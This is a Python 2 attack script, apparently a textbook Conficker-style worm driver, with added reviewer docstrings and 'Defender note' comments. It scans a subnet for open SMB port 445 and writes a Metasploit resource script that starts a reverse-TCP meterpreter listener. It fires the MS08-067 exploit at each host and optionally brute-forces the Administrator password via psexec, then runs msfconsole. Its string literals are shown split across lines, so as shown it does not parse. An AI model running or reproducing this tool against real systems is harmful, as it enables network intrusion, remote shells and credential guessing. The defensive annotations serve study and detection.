import os
import optparse
import sys
import nmap
def findTgts(subNet):
    """Scan *subNet* on TCP port 445 and return the hosts where it is open.

    Args:
        subNet: target specification passed straight to nmap (host, range or
            CIDR, whatever the nmap binary accepts).

    Returns:
        A list of host-address strings whose port-445 state is 'open'.
        Each hit is also printed (Python 2 print statement, kept verbatim).

    Defender note: a single-port sweep of a subnet is the first artefact this
    tool produces — it is visible in firewall, NetFlow and IDS logs before any
    exploit traffic follows.
    """
    nmScan = nmap.PortScanner()
    # Only port 445 is probed; anything not running SMB is ignored.
    nmScan.scan(subNet, '445')
    tgtHosts = []
    for host in nmScan.all_hosts():
        # has_tcp() guards the nested lookup; hosts with no TCP result are skipped.
        if nmScan[host].has_tcp(445):
            state = nmScan[host]['tcp'][445]['state']
            # 'filtered'/'closed' hosts are dropped silently.
            if state == 'open':
                print '[+] FOund Target Host: '+ host
                tgtHosts.append(host)
    return tgtHosts
def setupHandler(configFile, lhost, lport):
    """Write the resource-script lines that start a reverse-TCP listener.

    Emits a 'multi/handler' block for a windows/meterpreter/reverse_tcp
    payload on lhost:lport, runs it as a background job ('-j -z') and then
    sets a global option so later modules do not spawn their own handlers.

    Args:
        configFile: open, writable file object — the .rc script being built.
        lhost: listener address, inserted verbatim.
        lport: listener port; str() is applied.

    Returns:
        None; output goes only to configFile.

    NOTE(review): every write() below shows its string literal broken across
    two physical lines; presumably each ended in a newline escape sequence
    that was unescaped when this page was extracted, so the block as shown
    does not parse.
    NOTE(review): the 'set LHOST' line has no space before the address, and
    the option name on the last line looks misspelled — both as in the
    original.
    Defender note: the listener port (default '1337' when main() supplies
    no -p) and the outbound connections to it are the network artefacts of
    this stage.
    """
    configFile.write('use exploit/multi/handler
')
    configFile.write('set payload '+'windows/meterpreter/reverse_tcp
')
    configFile.write('set LPORT '+ str(lport)+ '
')
    configFile.write('set LHOST'+ lhost + '
')
    # Background job, no interactive session on connect.
    configFile.write('exploit -j -z
')
    configFile.write('setg DsiablePayloadHandler 1
')
def confickerExploit(configFile, tgtHost, lhost, lport):
    """Write the resource-script lines for one MS08-067 (netapi) attempt.

    Appends a 'windows/smb/ms08_067_netapi' block targeting *tgtHost* with
    a reverse-TCP meterpreter payload back to lhost:lport, run as a
    background job.

    Args:
        configFile: open, writable file object.
        tgtHost: target address; str() is applied.
        lhost: listener address, inserted verbatim.
        lport: listener port; str() is applied.

    Returns:
        None; output goes only to configFile.

    NOTE(review): as in setupHandler, each write() string literal is shown
    split across two lines — presumably lost newline escapes from extraction.
    Defender note: MS08-067 is a patched 2008 Server-service flaw; current
    or patched hosts are unaffected, and the attempt itself is detectable
    as anomalous SMB traffic to the target's port 445.
    """
    configFile.write('use exploit/windows/smb/ms08_067_netapi
')
    configFile.write('set RHOST '+ str(tgtHost) + '
')
    configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp
')
    configFile.write('set LPORT '+ str(lport) +'
')
    configFile.write('set LHOST '+ lhost +'
')
    configFile.write('exploit -j -z
')
def smbBrute(configFile, tgtHost, passwdFile, lhost, lport):
    """Write one psexec attempt per line of *passwdFile* against *tgtHost*.

    Every candidate password is tried for the fixed 'Administrator' user,
    each as its own 'windows/smb/psexec' block with a reverse-TCP
    meterpreter payload back to lhost:lport.

    Args:
        configFile: open, writable file object.
        tgtHost: target address; str() is applied.
        passwdFile: path to a newline-separated password list.
        lhost: listener address, inserted verbatim.
        lport: listener port; str() is applied.

    Returns:
        None; output goes only to configFile.

    NOTE(review): the password file is opened with open() and never closed
    (no close() or with-block).
    NOTE(review): the two strip() arguments and every write() literal are
    shown split across lines — presumably newline/carriage-return escapes
    lost during extraction; the block as shown does not parse.
    Defender note: this is one authentication attempt per candidate against
    a single account — the pattern account-lockout policy and failed-logon
    auditing (event 4625 on the target) exist to surface.
    """
    username = 'Administrator'
    pF = open(passwdFile, 'r')
    for password in pF.readlines():
        # Trim the line terminator(s) so they do not end up in 'set SMBPass'.
        password = password.strip('
').strip('
')
        configFile.write('use exploit/windows/smb/psexec
')
        configFile.write('set SMBUser '+ str(username) +'
')
        configFile.write('set SMBPass '+ str(password) +'
')
        configFile.write('set RHOST '+ str(tgtHost) +'
')
        configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp
')
        configFile.write('set LPORT '+ str(lport)+'
')
        configFile.write('set LHOST '+ lhost+'
')
        configFile.write('exploit -j -z
')
def main():
    """Parse options, find SMB hosts, build 'meta.rc' and run msfconsole on it.

    Options:
        -H  target address(es), required (passed to findTgts).
        -l  listener address, required.
        -p  listener port; defaults to '1337' when omitted.
        -F  password file; when given, smbBrute is also emitted per host.

    Side effects:
        Creates or overwrites 'meta.rc' in the current directory, then runs
        'msfconsole -r meta.rc' through os.system().

    NOTE(review): 'meta.rc' is opened before the options are validated, so a
    usage error still leaves an empty file behind, and the handle is only
    closed on the success path (exit(0) skips close()).
    NOTE(review): the usage string has no space between 'Usage' and '%prog';
    the '|' between the two None checks is a bitwise-or on booleans — it
    works here but 'or' is the idiom.
    Defender note: the on-disk meta.rc (containing LHOST/LPORT and any
    passwords tried) and the msfconsole process are the host-side artefacts
    of this tool.
    """
    configFile = open('meta.rc', 'w')
    parser = optparse.OptionParser('[-] Usage%prog '+ '-H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]')
    parser.add_option('-H', dest = 'tgtHost', type = 'string', help = 'specify the target address[es]')
    parser.add_option('-p', dest = 'lport', type = 'string', help = 'specify the listen port')
    parser.add_option('-l', dest = 'lhost', type = 'string', help = 'specify the listen address')
    parser.add_option('-F', dest = 'passwdFile', type = 'string', help = 'password file for SMB force attempt')
    (options, args) = parser.parse_args()
    # Both -H and -l are mandatory; print usage and stop otherwise.
    if (options.tgtHost == None ) | (options.lhost == None):
        print parser.usage
        exit(0)
    lhost = options.lhost
    lport = options.lport
    if lport == None :
        lport = '1337'
    passwdFile = options.passwdFile
    tgtHosts = findTgts(options.tgtHost)
    # One shared handler first, then one exploit block per discovered host.
    setupHandler(configFile, lhost, lport)
    for tgtHost in tgtHosts:
        confickerExploit(configFile, tgtHost, lhost, lport)
        if passwdFile != None:
            smbBrute(configFile, tgtHost, passwdFile, lhost, lport)
    configFile.close()
    # Hands the generated script to the Metasploit console.
    os.system('msfconsole -r meta.rc')
# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()